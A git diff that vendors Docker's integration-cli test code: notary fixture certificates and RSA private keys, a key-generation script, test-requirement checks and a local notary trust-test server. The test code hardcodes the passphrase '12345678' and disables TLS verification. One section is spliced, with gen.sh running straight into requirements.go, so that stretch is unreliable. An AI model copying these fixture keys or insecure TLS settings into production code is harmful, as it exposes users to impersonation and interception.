+zMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKorIJQbPtHVYdr4UxYnNmk6fbU +biEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj9fZ7Viw0t5IKXZPsxMhwknUT +9vmPzIJO6NiniwIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF +oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUdTXRP1EzxQ+UDZSoheVo +Mobud1cwDQYJKoZIhvcNAQELBQADggEBADV9asTWWdbmpkeRuKyi0xGho39ONK88 +xxkFlco766BVgemo/rGQj3oPuw6M6SzHFoJ6JUPjmLiAQDIGEU/2/b6LcOuLjP+4 +YejCcDTY3lSW/HMNoAmzr2foo/LngNGfe/qhVFUqV7GjFT9+XzFFBfIZ1cQiL2ed +kc8rgQxFPwWXFCSwaENWeFnMDugkd+7xanoAHq8GsJpg5fTruDTmJkUqC2RNiMLn +WM7QaqW7+lmUnMnc1IBoz0hFhgoiadWM/1RQxx51zTVw6Au1koIm4ZXu5a+/WyC8 +K1+HyUbc0AVaDaRBpRSOR9aHRwLGh6WQ4aUZQNyJroc999qfYrDEEV8= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key new file mode 100644 index 0000000000..a61d18cc3d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key @@ -0,0 +1,27 @@ 
+-----BEGIN RSA PRIVATE KEY----- +MIIEpQIBAAKCAQEAqfbJk2DkC9FJVjV2+Q2CQrJphG3vFc1Qlu9jgVA5RhGmF9jJ +zetsclsV/95nBhinIGcSmPQAl318G7Bz/cG/6O2n5+hj+S1+YOvQweReZj3d4kCe +S86SOyLNTpMD9gsF0S8nR1RNh0jD4t1vxAVeGD1o61U8/k0O5eDoeOfOSWZagKk5 +PhyrMZgNip4IrG46umCkFlrwzMMcgQdwTQXywPqkr/LmYpqT1WpMlzHYTQEY8rKo +rIJQbPtHVYdr4UxYnNmk6fbUbiEP1DQlwjBWcFTsDLqXKP/K+e3O0/e/hMB0y7Tj +9fZ7Viw0t5IKXZPsxMhwknUT9vmPzIJO6NiniwIDAQABAoIBAQCAr/ed3A2umO7T +FDYZik3nXBiiiW4t7r+nGGgZ3/kNgY1lnuHlROxehXLZwbX1mrLnyML/BjhwezV9 +7ZNVPd6laVPpNj6DyxtWHRZ5yARlm1Al39E7CpQTrF0QsiWcpGnqIa62xjDRTpnq +askV/Q5qggyvqmE9FnFCQpEiAjlhvp7F0kVHVJm9s3MK3zSyR0UTZ3cpYus2Jr2z +OotHgAMHq5Hgb3dvxOeE2xRMeYAVDujbkNzXm2SddAtiRdLhWDh7JIr3zXhp0HyN +4rLOyhlgz00oIGeDt/C0q3fRmghr3iZOG+7m2sUx0FD1Ru1dI9v2A+jYmIVNW6+x +YJk5PzxJAoGBANDj7AGdcHSci/LDBPoTTUiz3uucAd27/IJma/iy8mdbVfOAb0Fy +PRSPvoozlpZyOxg2J4eH/o4QxQR4lVKtnLKZLNHK2tg3LarwyBX1LiI3vVlB+DT1 +AmV8i5bJAckDhqFeEH5qdWZFi03oZsSXWEqX5iMYCrdK5lTZggcrFZeHAoGBANBL +fkk3knAdcVfTYpmHx18GBi2AsCWTd20KD49YBdbVy0Y2Jaa1EJAmGWpTUKdYx40R +H5CuGgcAviXQz3bugdTU1I3tAclBtpJNU7JkhuE+Epz0CM/6WERJrE0YxcGQA5ui +6fOguFyiXD1/85jrDBOKy74aoS7lYz9r/a6eqmjdAoGBAJpm/nmrIAZx+Ff2ouUe +A1Ar9Ch/Zjm5zEmu3zwzOU4AiyWz14iuoktifNq2iyalRNz+mnVpplToPFizsNwu +C9dPtXtU0DJlhtIFrD/evLz6KnGhe4/ZUm4lgyBvb2xfuNHqL5Lhqelwmil6EQxb +Oh3Y7XkfOjyFln89TwlxZUJdAoGAJRMa4kta7EvBTeGZLjyltvsqhFTghX+vBSCC +ToBbYbbiHJgssXSPAylU4sD7nR3HPwuqM6VZip+OOMrm8oNXZpuPTce+xqTEq1vK +JvmPrG3RAFDLdMFZjqYSXhKnuGE60yv3Ol8EEbDwfB3XLQPBPYU56Jdy0xcPSE2f +dMJXEJ0CgYEAisZw0nXw6lFeYecu642EGuU0wv1O9i21p7eho9QwOcsoTl4Q9l+M +M8iBv+qTHO+D19l4JbkGvy2H2diKoYduUFACcuiFYs8fjrT+4Z6DyOQAQGAf6Ylw +BFbU15k6KbA9v4mZDfd1tY9x62L/XO55ZxYG+J+q0e26tEThgD8cEog= +-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt new file mode 100644 index 0000000000..c8cbe46bdf --- /dev/null +++ 
b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt @@ -0,0 +1,21 @@ +-----BEGIN CERTIFICATE----- +MIIDhTCCAm2gAwIBAgIJANae++ZkUEWMMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV +BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD +VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ5 +WhcNMjYwNjI4MTc0ODQ5WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT +BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk +ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqULAjgba +Y2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4ltkQj1iO4zBTs0Ft9EzXFc5ZBh +pTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3HZpVOlEMI3npRfBGNIBllUaRN +PWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ImhSo3aipJUHHcp9Z9NgvpNC +3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw+YTrWZq3qVnnqUouHO//c9PG +Ry3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih58i/OBKe81eD9NuZDP2KrjTxI +5xkXKhj6DV2NnQIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF +oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUDt95hiqbQvi0KcvZGAUu +VisnztQwDQYJKoZIhvcNAQELBQADggEBAGi7qHai7MWbfeu6SlXhzIP3AIMa8TMi +lp/+mvPUFPswIVqYJ71MAN8uA7CTH3z50a2vYupGeOEtZqVJeRf+xgOEpwycncxp +Qz6wc6TWPVIoT5q1Hqxw1RD2MyKL+Y+QBDYwFxFkthpDMlX48I9frcqoJUWFxBF2 +lnRr/cE7BbPE3sMbXV3wGPlH7+eUf+CgzXJo2HB6THzagyEgNrDiz/0rCQa1ipFd +mNU3D/U6BFGmJNxhvSOtXX9escg8yjr05YwwzokHS2K4jE0ZuJPBd50C/Rvo3Mf4 +0h7/2Q95e7d42zPe9WYPu2F8KTWsf4r+6ddhKrKhYzXIcTAfHIOiO+U= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key new file mode 100644 index 0000000000..f473cc495a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEAqULAjgbaY2I10WfqdmYnPfEqEe6iMDbzcgECb2xKafXcI4lt +kQj1iO4zBTs0Ft9EzXFc5ZBhpTjZrL6vrIa0y/CH2BiIHBJ0wRHx/40HXp4DSj3H +ZpVOlEMI3npRfBGNIBllUaRNPWG7zL7DcKMIepBfPXyjBsxzH3yNiISq0W5hSiy+ 
+ImhSo3aipJUHHcp9Z9NgvpNC3QvnxsGKRnECmDRDlxkq+FQu9Iqs/HWFYWgyfcsw ++YTrWZq3qVnnqUouHO//c9PGRy3sZSDU97MwvkjvWys1e01Xvd3AbHx08YAsxih5 +8i/OBKe81eD9NuZDP2KrjTxI5xkXKhj6DV2NnQIDAQABAoIBAGK0ZKnuYSiXux60 +5MvK4pOCsa/nY3mOcgVHhW4IzpRgJdIrcFOlz9ncXrBsSAIWjX7o3u2Ydvjs4DOW +t8d6frB3QiDInYcRVDjLCD6otWV97Bk9Ua0G4N4hAWkMF7ysV4oihS1JDSoAdo39 +qOdki6s9yeyHZGKwk2oHLlowU5TxQMBA8DHmxqBII1HTm+8xRz45bcEqRXydYSUn +P1JuSU9jFqdylxU+Nrq6ehslMQ3y7qNWQyiLGxu6EmR+vgrzSU0s3iAOqCHthaOS +VBBXPL3DNEYUS+0QGnGrACuJhanOMBfdiO6Orelx6ZzWZm38PNGv0yBt0WCM+8/A +TtQNGkECgYEA1LqR6AH9XikUQ0+rM4526BgVuYqtjw21h4Lj9alaA+YTQntBBJOv +iAcUpnJiV4T8jzAMLeqpK8R/rbxRnK5S9jOV2gr+puk4L6tH46cgahBUESDigDp8 +6vK8ur6ubBcXNPh3AT6rsPj+Ph2EU3raqiYdouvCdga/OCYZb+jr6UkCgYEAy7Cr +l8WssI/8/ORcQ4MFJFNyfz/Y2beNXyLd1PX0H+wRSiGcKzeUuTHNtzFFpMbrK/nx +ZOPCT2ROdHsBHzp1L+WquCb0fyMVSiYiXBU+VCFDbUU5tBr3ycTc7VwuFPENOiha +IdlWgew/aW110FQHIaqe9g+htRe+mXe++faZtbUCgYB/MSJmNzJX53XvHSZ/CBJ+ +iVAMBSfq3caJRLCqRNzGcf1YBbwFUYxlZ95n+wJj0+byckcF+UW3HqE8rtmZNf3y +qTtTCLnj8JQgpGeybU4LPMIXD7N9+fqQvBwuCC7gABpnGJyHCQK9KNNTLnDdPRqb +G3ki3ZYC3dvdZaJV8E2FyQKBgQCMa5Mf4kqWvezueo+QizZ0QILibqWUEhIH0AWV +1qkhiKCytlDvCjYhJdBnxjP40Jk3i+t6XfmKud/MNTAk0ywOhQoYQeKz8v+uSnPN +f2ekn/nXzq1lGGJSWsDjcXTjQvqXaVIZm7cjgjaE+80IfaUc9H75qvUT3vaq3f5u +XC7DMQKBgQDMAzCCpWlEPbZoFMl6F49+7jG0/TiqM/WRUSQnNtufPMbrR9Je4QM1 +L1UCANCPaHFOncKYer15NfIV1ctt5MZKImevDsUaQO8CUlO+dzd5H8KvHw9E29gA +B22v8k3jIjsYeRL+UJ/sBnWHgxdAe/NEM+TdlP2oP9D1gTifutPqAg== +-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh new file mode 100755 index 0000000000..8d6381cec4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh @@ -0,0 +1,18 @@ +for selfsigned in delgkey1 delgkey2 delgkey3 delgkey4; do + subj='/C=US/ST=CA/L=SanFrancisco/O=Docker/CN=delegation' + + openssl genrsa -out "${selfsigned}.key" 2048 + openssl req -new -key 
"${selfsigned}.key" -out "${selfsigned}.csr" -sha256 -subj "${subj}" + cat > "${selfsigned}.cnf" < 1 && buf[0] == 'Y' + }, + "Test requires apparmor is enabled.", + } + RegistryHosting = testRequirement{ + func() bool { + // for now registry binary is built only if we're running inside + // container through `make test`. Figure that out by testing if + // registry binary is in PATH. + _, err := exec.LookPath(v2binary) + return err == nil + }, + fmt.Sprintf("Test requires an environment that can host %s in the same host", v2binary), + } + NotaryHosting = testRequirement{ + func() bool { + // for now notary binary is built only if we're running inside + // container through `make test`. Figure that out by testing if + // notary-server binary is in PATH. + _, err := exec.LookPath(notaryServerBinary) + return err == nil + }, + fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary), + } + NotaryServerHosting = testRequirement{ + func() bool { + // for now notary-server binary is built only if we're running inside + // container through `make test`. Figure that out by testing if + // notary-server binary is in PATH. 
+ _, err := exec.LookPath(notaryServerBinary) + return err == nil + }, + fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary), + } + NotOverlay = testRequirement{ + func() bool { + return !strings.HasPrefix(daemonStorageDriver, "overlay") + }, + "Test requires underlying root filesystem not be backed by overlay.", + } + + Devicemapper = testRequirement{ + func() bool { + return strings.HasPrefix(daemonStorageDriver, "devicemapper") + }, + "Test requires underlying root filesystem to be backed by devicemapper.", + } + + IPv6 = testRequirement{ + func() bool { + cmd := exec.Command("test", "-f", "/proc/net/if_inet6") + + if err := cmd.Run(); err != nil { + return true + } + return false + }, + "Test requires support for IPv6", + } + UserNamespaceROMount = testRequirement{ + func() bool { + // quick case--userns not enabled in this test run + if os.Getenv("DOCKER_REMAP_ROOT") == "" { + return true + } + if _, _, err := dockerCmdWithError("run", "--rm", "--read-only", "busybox", "date"); err != nil { + return false + } + return true + }, + "Test cannot be run if user namespaces enabled but readonly mounts fail on this kernel.", + } + UserNamespaceInKernel = testRequirement{ + func() bool { + if _, err := os.Stat("/proc/self/uid_map"); os.IsNotExist(err) { + /* + * This kernel-provided file only exists if user namespaces are + * supported + */ + return false + } + + // We need extra check on redhat based distributions + if f, err := os.Open("/sys/module/user_namespace/parameters/enable"); err == nil { + defer f.Close() + b := make([]byte, 1) + _, _ = f.Read(b) + if string(b) == "N" { + return false + } + return true + } + + return true + }, + "Kernel must have user namespaces configured and enabled.", + } + NotUserNamespace = testRequirement{ + func() bool { + root := os.Getenv("DOCKER_REMAP_ROOT") + if root != "" { + return false + } + return true + }, + "Test cannot be run when remapping root", + } + IsPausable = 
testRequirement{ + func() bool { + if daemonPlatform == "windows" { + return isolation == "hyperv" + } + return true + }, + "Test requires containers are pausable.", + } + NotPausable = testRequirement{ + func() bool { + if daemonPlatform == "windows" { + return isolation == "process" + } + return false + }, + "Test requires containers are not pausable.", + } + IsolationIsHyperv = testRequirement{ + func() bool { + return daemonPlatform == "windows" && isolation == "hyperv" + }, + "Test requires a Windows daemon running default isolation mode of hyperv.", + } + IsolationIsProcess = testRequirement{ + func() bool { + return daemonPlatform == "windows" && isolation == "process" + }, + "Test requires a Windows daemon running default isolation mode of process.", + } +) + +// testRequires checks if the environment satisfies the requirements +// for the test to run or skips the tests. +func testRequires(c *check.C, requirements ...testRequirement) { + for _, r := range requirements { + if !r.Condition() { + c.Skip(r.SkipMessage) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_unix.go b/vendor/github.com/docker/docker/integration-cli/requirements_unix.go new file mode 100644 index 0000000000..ef017d8a76 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/requirements_unix.go @@ -0,0 +1,159 @@ +// +build !windows + +package main + +import ( + "bytes" + "io/ioutil" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/sysinfo" +) + +var ( + // SysInfo stores information about which features a kernel supports. 
+ SysInfo *sysinfo.SysInfo + cpuCfsPeriod = testRequirement{ + func() bool { + return SysInfo.CPUCfsPeriod + }, + "Test requires an environment that supports cgroup cfs period.", + } + cpuCfsQuota = testRequirement{ + func() bool { + return SysInfo.CPUCfsQuota + }, + "Test requires an environment that supports cgroup cfs quota.", + } + cpuShare = testRequirement{ + func() bool { + return SysInfo.CPUShares + }, + "Test requires an environment that supports cgroup cpu shares.", + } + oomControl = testRequirement{ + func() bool { + return SysInfo.OomKillDisable + }, + "Test requires Oom control enabled.", + } + pidsLimit = testRequirement{ + func() bool { + return SysInfo.PidsLimit + }, + "Test requires pids limit enabled.", + } + kernelMemorySupport = testRequirement{ + func() bool { + return SysInfo.KernelMemory + }, + "Test requires an environment that supports cgroup kernel memory.", + } + memoryLimitSupport = testRequirement{ + func() bool { + return SysInfo.MemoryLimit + }, + "Test requires an environment that supports cgroup memory limit.", + } + memoryReservationSupport = testRequirement{ + func() bool { + return SysInfo.MemoryReservation + }, + "Test requires an environment that supports cgroup memory reservation.", + } + swapMemorySupport = testRequirement{ + func() bool { + return SysInfo.SwapLimit + }, + "Test requires an environment that supports cgroup swap memory limit.", + } + memorySwappinessSupport = testRequirement{ + func() bool { + return SysInfo.MemorySwappiness + }, + "Test requires an environment that supports cgroup memory swappiness.", + } + blkioWeight = testRequirement{ + func() bool { + return SysInfo.BlkioWeight + }, + "Test requires an environment that supports blkio weight.", + } + cgroupCpuset = testRequirement{ + func() bool { + return SysInfo.Cpuset + }, + "Test requires an environment that supports cgroup cpuset.", + } + seccompEnabled = testRequirement{ + func() bool { + return supportsSeccomp && SysInfo.Seccomp + }, + "Test 
requires that seccomp support be enabled in the daemon.", + } + bridgeNfIptables = testRequirement{ + func() bool { + return !SysInfo.BridgeNFCallIPTablesDisabled + }, + "Test requires that bridge-nf-call-iptables support be enabled in the daemon.", + } + bridgeNfIP6tables = testRequirement{ + func() bool { + return !SysInfo.BridgeNFCallIP6TablesDisabled + }, + "Test requires that bridge-nf-call-ip6tables support be enabled in the daemon.", + } + unprivilegedUsernsClone = testRequirement{ + func() bool { + content, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone") + if err == nil && strings.Contains(string(content), "0") { + return false + } + return true + }, + "Test cannot be run with 'sysctl kernel.unprivileged_userns_clone' = 0", + } + ambientCapabilities = testRequirement{ + func() bool { + content, err := ioutil.ReadFile("/proc/self/status") + if err == nil && strings.Contains(string(content), "CapAmb:") { + return true + } + return false + }, + "Test cannot be run without a kernel (4.3+) supporting ambient capabilities", + } + overlayFSSupported = testRequirement{ + func() bool { + cmd := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "cat /proc/filesystems") + out, err := cmd.CombinedOutput() + if err != nil { + return false + } + return bytes.Contains(out, []byte("overlay\n")) + }, + "Test cannot be run without suppport for overlayfs", + } + overlay2Supported = testRequirement{ + func() bool { + if !overlayFSSupported.Condition() { + return false + } + + daemonV, err := kernel.ParseRelease(daemonKernelVersion) + if err != nil { + return false + } + requiredV := kernel.VersionInfo{Kernel: 4} + return kernel.CompareKernelVersion(*daemonV, requiredV) > -1 + + }, + "Test cannot be run without overlay2 support (kernel 4.0+)", + } +) + +func init() { + SysInfo = sysinfo.New(true) +} diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars.go b/vendor/github.com/docker/docker/integration-cli/test_vars.go new 
file mode 100644 index 0000000000..97bcddd5f4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars.go @@ -0,0 +1,11 @@ +package main + +// sleepCommandForDaemonPlatform is a helper function that determines what +// the command is for a sleeping container based on the daemon platform. +// The Windows busybox image does not have a `top` command. +func sleepCommandForDaemonPlatform() []string { + if daemonPlatform == "windows" { + return []string{"sleep", "240"} + } + return []string{"top"} +} diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go new file mode 100644 index 0000000000..7633b346ba --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go @@ -0,0 +1,8 @@ +// +build !test_no_exec + +package main + +const ( + // indicates docker daemon tested supports 'docker exec' + supportsExec = true +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go new file mode 100644 index 0000000000..0845090524 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go @@ -0,0 +1,8 @@ +// +build test_no_exec + +package main + +const ( + // indicates docker daemon tested supports 'docker exec' + supportsExec = false +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go new file mode 100644 index 0000000000..2f47ab07a0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go @@ -0,0 +1,8 @@ +// +build !seccomp + +package main + +const ( + // indicates docker daemon built with seccomp support + supportsSeccomp = false +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go new 
file mode 100644 index 0000000000..00cf697209 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go @@ -0,0 +1,8 @@ +// +build seccomp + +package main + +const ( + // indicates docker daemon built with seccomp support + supportsSeccomp = true +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go b/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go new file mode 100644 index 0000000000..f9ecc01123 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go @@ -0,0 +1,14 @@ +// +build !windows + +package main + +const ( + // identifies if test suite is running on a unix platform + isUnixCli = true + + expectedFileChmod = "-rw-r--r--" + + // On Unix variants, the busybox image comes with the `top` command which + // runs indefinitely while still being interruptible by a signal. + defaultSleepImage = "busybox" +) diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go b/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go new file mode 100644 index 0000000000..bfc9a5a915 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go @@ -0,0 +1,15 @@ +// +build windows + +package main + +const ( + // identifies if test suite is running on a unix platform + isUnixCli = false + + // this is the expected file permission set on windows: gh#11395 + expectedFileChmod = "-rwxr-xr-x" + + // On Windows, the busybox image doesn't have the `top` command, so we rely + // on `sleep` with a high duration. 
+ defaultSleepImage = "busybox" +) diff --git a/vendor/github.com/docker/docker/integration-cli/trust_server.go b/vendor/github.com/docker/docker/integration-cli/trust_server.go new file mode 100644 index 0000000000..18876311a1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/trust_server.go @@ -0,0 +1,344 @@ +package main + +import ( + "fmt" + "io/ioutil" + "net" + "net/http" + "os" + "os/exec" + "path/filepath" + "strings" + "time" + + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/go-connections/tlsconfig" + "github.com/go-check/check" +) + +var notaryBinary = "notary" +var notaryServerBinary = "notary-server" + +type keyPair struct { + Public string + Private string +} + +type testNotary struct { + cmd *exec.Cmd + dir string + keys []keyPair +} + +const notaryHost = "localhost:4443" +const notaryURL = "https://" + notaryHost + +func newTestNotary(c *check.C) (*testNotary, error) { + // generate server config + template := `{ + "server": { + "http_addr": "%s", + "tls_key_file": "%s", + "tls_cert_file": "%s" + }, + "trust_service": { + "type": "local", + "hostname": "", + "port": "", + "key_algorithm": "ed25519" + }, + "logging": { + "level": "debug" + }, + "storage": { + "backend": "memory" + } +}` + tmp, err := ioutil.TempDir("", "notary-test-") + if err != nil { + return nil, err + } + confPath := filepath.Join(tmp, "config.json") + config, err := os.Create(confPath) + if err != nil { + return nil, err + } + defer config.Close() + + workingDir, err := os.Getwd() + if err != nil { + return nil, err + } + if _, err := fmt.Fprintf(config, template, notaryHost, filepath.Join(workingDir, "fixtures/notary/localhost.key"), filepath.Join(workingDir, "fixtures/notary/localhost.cert")); err != nil { + os.RemoveAll(tmp) + return nil, err + } + + // generate client config + clientConfPath := filepath.Join(tmp, "client-config.json") + clientConfig, err := os.Create(clientConfPath) + if err 
!= nil { + return nil, err + } + defer clientConfig.Close() + + template = `{ + "trust_dir" : "%s", + "remote_server": { + "url": "%s", + "skipTLSVerify": true + } +}` + if _, err = fmt.Fprintf(clientConfig, template, filepath.Join(cliconfig.ConfigDir(), "trust"), notaryURL); err != nil { + os.RemoveAll(tmp) + return nil, err + } + + // load key fixture filenames + var keys []keyPair + for i := 1; i < 5; i++ { + keys = append(keys, keyPair{ + Public: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.crt", i)), + Private: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.key", i)), + }) + } + + // run notary-server + cmd := exec.Command(notaryServerBinary, "-config", confPath) + if err := cmd.Start(); err != nil { + os.RemoveAll(tmp) + if os.IsNotExist(err) { + c.Skip(err.Error()) + } + return nil, err + } + + testNotary := &testNotary{ + cmd: cmd, + dir: tmp, + keys: keys, + } + + // Wait for notary to be ready to serve requests. + for i := 1; i <= 20; i++ { + if err = testNotary.Ping(); err == nil { + break + } + time.Sleep(10 * time.Millisecond * time.Duration(i*i)) + } + + if err != nil { + c.Fatalf("Timeout waiting for test notary to become available: %s", err) + } + + return testNotary, nil +} + +func (t *testNotary) Ping() error { + tlsConfig := tlsconfig.ClientDefault() + tlsConfig.InsecureSkipVerify = true + client := http.Client{ + Transport: &http.Transport{ + Proxy: http.ProxyFromEnvironment, + Dial: (&net.Dialer{ + Timeout: 30 * time.Second, + KeepAlive: 30 * time.Second, + }).Dial, + TLSHandshakeTimeout: 10 * time.Second, + TLSClientConfig: tlsConfig, + }, + } + resp, err := client.Get(fmt.Sprintf("%s/v2/", notaryURL)) + if err != nil { + return err + } + if resp.StatusCode != http.StatusOK { + return fmt.Errorf("notary ping replied with an unexpected status code %d", resp.StatusCode) + } + return nil +} + +func (t *testNotary) Close() { + t.cmd.Process.Kill() + os.RemoveAll(t.dir) +} + +func (s *DockerTrustSuite) 
trustedCmd(cmd *exec.Cmd) { + pwd := "12345678" + trustCmdEnv(cmd, notaryURL, pwd, pwd) +} + +func (s *DockerTrustSuite) trustedCmdWithServer(cmd *exec.Cmd, server string) { + pwd := "12345678" + trustCmdEnv(cmd, server, pwd, pwd) +} + +func (s *DockerTrustSuite) trustedCmdWithPassphrases(cmd *exec.Cmd, rootPwd, repositoryPwd string) { + trustCmdEnv(cmd, notaryURL, rootPwd, repositoryPwd) +} + +func trustCmdEnv(cmd *exec.Cmd, server, rootPwd, repositoryPwd string) { + env := []string{ + "DOCKER_CONTENT_TRUST=1", + fmt.Sprintf("DOCKER_CONTENT_TRUST_SERVER=%s", server), + fmt.Sprintf("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE=%s", rootPwd), + fmt.Sprintf("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE=%s", repositoryPwd), + } + cmd.Env = append(os.Environ(), env...) +} + +func (s *DockerTrustSuite) setupTrustedImage(c *check.C, name string) string { + repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + + if err != nil { + c.Fatalf("Error running trusted push: %s\n%s", err, out) + } + if !strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + if out, status := dockerCmd(c, "rmi", repoName); status != 0 { + c.Fatalf("Error removing image %q\n%s", repoName, out) + } + + return repoName +} + +func (s *DockerTrustSuite) setupTrustedplugin(c *check.C, source, name string) string { + repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name) + // tag the image and upload it to the private registry + dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", repoName, source) + + pushCmd := exec.Command(dockerBinary, "plugin", "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + 
+ if err != nil { + c.Fatalf("Error running trusted plugin push: %s\n%s", err, out) + } + if !strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + if out, status := dockerCmd(c, "plugin", "rm", "-f", repoName); status != 0 { + c.Fatalf("Error removing plugin %q\n%s", repoName, out) + } + + return repoName +} + +func notaryClientEnv(cmd *exec.Cmd) { + pwd := "12345678" + env := []string{ + fmt.Sprintf("NOTARY_ROOT_PASSPHRASE=%s", pwd), + fmt.Sprintf("NOTARY_TARGETS_PASSPHRASE=%s", pwd), + fmt.Sprintf("NOTARY_SNAPSHOT_PASSPHRASE=%s", pwd), + fmt.Sprintf("NOTARY_DELEGATION_PASSPHRASE=%s", pwd), + } + cmd.Env = append(os.Environ(), env...) +} + +func (s *DockerTrustSuite) notaryInitRepo(c *check.C, repoName string) { + initCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "init", repoName) + notaryClientEnv(initCmd) + out, _, err := runCommandWithOutput(initCmd) + if err != nil { + c.Fatalf("Error initializing notary repository: %s\n", out) + } +} + +func (s *DockerTrustSuite) notaryCreateDelegation(c *check.C, repoName, role string, pubKey string, paths ...string) { + pathsArg := "--all-paths" + if len(paths) > 0 { + pathsArg = "--paths=" + strings.Join(paths, ",") + } + + delgCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), + "delegation", "add", repoName, role, pubKey, pathsArg) + notaryClientEnv(delgCmd) + out, _, err := runCommandWithOutput(delgCmd) + if err != nil { + c.Fatalf("Error adding %s role to notary repository: %s\n", role, out) + } +} + +func (s *DockerTrustSuite) notaryPublish(c *check.C, repoName string) { + pubCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "publish", repoName) + notaryClientEnv(pubCmd) + out, _, err := runCommandWithOutput(pubCmd) + if err != nil { + c.Fatalf("Error publishing notary repository: %s\n", out) + } +} + +func (s 
